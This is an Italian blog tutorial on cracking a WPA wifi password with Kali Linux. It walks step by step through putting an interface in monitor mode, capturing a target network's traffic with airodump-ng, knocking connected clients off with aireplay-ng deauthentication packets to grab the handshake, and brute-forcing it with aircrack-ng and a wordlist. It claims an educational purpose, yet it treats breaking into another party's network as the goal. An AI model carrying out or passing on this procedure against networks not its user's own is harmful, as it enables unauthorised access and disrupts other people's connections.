Nicholas Giordano

Cloud Arch. & Full Stack Developer

Craccare una rete wifi

Con questo articolo vedremo come è possibile craccare una rete wifi in modo da potervi accedere. Inutile ricordarvi che questa guida è a semplice scopo informativo/educativo. Possiamo utilizzarla per testare la sicurezza del nostro router in modo da migliorarla ed evitare l’accesso a terzi non autorizzati.
Per effettuare questa operazione utilizzeremo una distribuzione linux molto conosciuta chiamata “kali”, che presenta al suo interno una serie di tool molto comodi per effettuare test di varia natura sulla sicurezza.

Possiamo installare questo sistema sul nostro compuuter, utilizzare una sua live o utilizzarlo da macchina virtuale, il risultato e i procedimenti da eseguire non cambieranno.

La prima operazione che dobbiamo eseguire è quella di aprire un terminale di root, possiamo farlo aprendo un qualsiasi terminale e scrivendo

1
su root

a questo punto ci verrà chiesta una password, la inseriamo e premiamo invio.
Se non dovessimo sapere quale sia la password di root e abbiamo un utente con privileggi di amministratore possiamo digitare

1
sudo passwd root

a questo punto ci sarà chiesto di inserire una nuova password per l’utente di root. Una volta modificata facciamo nuovamente “su root”, inseriamo la nuova password e dovremmo quindi trovarci una shcermata di terminale in cui compare la seguente cosa:

pic1digitiamo ora il comando “cd” (senza virgolette ovviamente) per evitare di trovarci nella cartella sbagliata e poi il comando “clear “per ripulire la scermata corrente.
Una vaolta fatto ciò possiamo iniziare il nostro attacco! 😀
L’attacco consiste nel monitorare tutti gli accessi e i pacchetti scambiati da dispisitivi che si connettono e disconnettono dalla rete alla quale vogliamo effettuare l’accesso. In questo articolo non mi dilungherò sui tecnicismi di questa operazione, sul procedimento dell’handshake e sul funzionamento dei router, ma mi limiterò ad elencare i procedimenti da affrontare. Il tutto per rendere questa guida leggibile anche per i meno esperti. Per chiunque volesse avere informazioni più dettagliate sarà possibile commentare questo articolo per aprire poi una discussione.

Passaggio uno: i dati della rete da attaccare

digiatiamo il seguente comando:

1
airmon-ng

Questo software ci permette di visualizzare tutte le schede di rete wireless che supportano la modalità monitor (se non otteniamo risultati dobbiamo procurarci una scheda che supporti la modalità monitor, un adattatore usb o via dicendo, ma in tutti i moderni laptop è presente questa modalità quindi difficilmente dovreste avere problemi)

pic2

Dobbiamo ora prestare molta attenzione al nome che la nostra inferfaccia ha, nel mio caso wlan0.
Una volta identificata l’interfaccia di rete possiamo attivare la modalità monitor sulla suddetta interfaccia che andrà ad analizzare tutte le reti wifi presenti nel suo raggio d’azione per carpirne i segnali e i dati. Per fare cio digitiamo:

1
airmon-ng start [nome dell'interfaccia]

che nel mio caso sarà:

1
airmon-ng start wlan0

Una volta fatto ciò ci troveremo di fronte ad una schermata di questo tipo

pic3E’ molto probabile che vi siano dei processi attivi che possono dare fastidio a questa modalità “monitor”, come ci suggerisce il programma stesso possiamo terminarli digitando:

1
airmon-ng check kill

Una volta fatto ciò possiamo nuovamente eseguire il comando:

1
airmon-ng start [nome interfaccia]

(nel mio caso wlan0)
ed otterremo una scermata del genere

pic4Nella foto precedente vedete  il “nuovo nome” associato all’interfaccia monitor appena abilitata, ricordiamocelo perchè a breve lo utilizzeremo, nel mio caso questo nome sarà wlan0mon.

Digitiamo ora:

1
airodump-ng [nome interfaccia monitor ]

che nel mio caso sarà:

1
airodump-ng wlan0mon

Una volta fatto ciò il programma inizierà ad elencare tutte le reti wifi presenti nel nostro raggio d’azione, una volta comparsa la rete che vogliamo attaccare possiamo premere CTRL+C per terminarne l’esecuzione.
Avremo dunque una schermata come questa

pic5Prendiamo ora nota del BSSID della rete da attaccare e del canale su cui trasmette, utilizzeremo queste informazioni nel passaggio successivo.

Passaggio 2: analisi della rete da attaccare

Una volta terminato il passaaggio 1 possiamo dedicarci all’analisi esclusiva della rete che desideriamo violare (sempre a scopi educativi ovviamnte <3). Sempre da terminale root andiamo a creare una cartella che ci servirà per contenere una serie di file di varia natura che serviranno al programma per proseguire nell’attacco, per creare questa cartella digitiamo il comando:

1
mkdir attacco_wifi

dove “attacco_wifi” sarà il nome della cartella che utilizzeremo a questo scopo.
Una volta fatto ciò possiamo digitare:

1
airodump-ng -c [canale] --bssid [bssid] -w /root/attacco_wifi/ [interfaccia monitor]

che nel mio caso sarà:

1
airodump-ng -c 6 --bssid AE:5F:3E:D4:94:8F  -w /root/attacco_wifi/ wlan0mon

Comparirà quindi la schermata d’analisi relativa alla rete che vogliamo attaccare

pic6Ora non dobbiamo far altro che aspettare che un dispositivo qualsiasi si connetta a questa rete, è una procedura che richiede un po di pazienza ma quando vià succede lo vedremo comparire in questo modo

pic7

Ovviamente questa opzione non è totalmente pratica, infatti potrebbe essere possibile che nessun nuovo dispositivo si connetta e disconnetta alla rete, cosa che a noi invece serve per proseguire nell’attacco.
Come fare allora? Semplice! Forziamo i dispositivi già connessi a disconnettersi per poi riconnettersi e captare un po’ dei dati che ci servono per procedere.
Per fare ciò utilizzamo un altro interessante programma che si chiama aireplay-ng che ci permetterà di inviare dei particolari pacchetti chiamati pacchetti di deauth e che forzeranno il o i dispositivi connessi a disconnettersi per ritentare la connessione.
Apriamo una nuova schermata di terminale assicurandoci che quella presente nella foto precedente resti attiva e digitiamo il seguente comando:

1
aireplay-ng –0 2 –a [router bssid] –c [client bssid] [nome interfaccia]

che nel mio caso sarà:

1
aireplay-ng –0 2 –a AE:5F:3E:D4:94:8F –c 00:F4:6F:42:2F:B1 wlan0mon

Una volta digitato questo comando nel secondo terminale dobbiamo attendere che nel primo terminale aperto e in cui è in esecuzione airodump-ng compaia “l‘handshake“.
Ovviamente i passaggi sopra elencati sono da ignorare se l’handshake fosse già comparso, la procedura di aireplay-ng va usata soltanto per forzare nuovi collegamenti fino a trovare l’handshake. (Nel mio caso ad esempio non è servito).
Una volta eseguito aireplay dobbiamo semplicemente attendere che l’hasndshake compaia nel terminale di airodump-ng. (Mi raccomando che questo HANDSHAKE ci serve!)

Passaggio 3: Cracckiamo la password!

Una volta ottenuto l’handshake segnamocelo e procediamo a chiudere tutti i terminali aperti assicurandoci prima di aver fatto CRTL+C su tutti loro per terminare anche gli eventuali programmi in esecuzione.
Apriamo ora un nuovo terminale (sempre root) ed iniziamo il passaggio finale della nostra guida.
Digitiamo il seguente comando:

1
aircrack-ng -a2 -b [bssid] -w /root/attacco_wifi/wpa.txt /root/attacco_wifi/*.cap

che nel mio casò sarà:

1
aircrack-ng -a2 -b AE:5F:3E:D4:94:8F -w /root/attacco_wifi/wpa.txt /root/attacco_wifi*.cap

(Notare che il file wpa.txt, che deve essere posizionato all’interno della cartella attacco_wifi, deve contenere una wordlist o dizionario di password! Per generare un dizionario possiamo utilizzare programmi come crunch di cui a breve sarà fatta una guida o possiamo reperirle online).

Una volta fatto ciò dobbiamo attendere…*sig*… può volerci anche molto e la cosa varia in base alla grandezza e precisione del dizionario che stiamo utilizzando, ma una volta completata la nostra operazione comparirà una schermata di questo genere che ci comunica che la password è stata trovata.

pic8Una volta ottenuta la password ricordiamoci di ripristinare correttamente i servizi di rete disattivando la modalità monitor con il seguente comando:

1
airmon-ng stop [nome interfaccia monitor]

che nel mio caso sarà:

1
airmon-ng stop wlan0mon

e riattivando i servizi di gestione della rete con il comando:

1
./etc/init.d/networking start

e poi con il comando:

1
./etc/init.d/network-manager start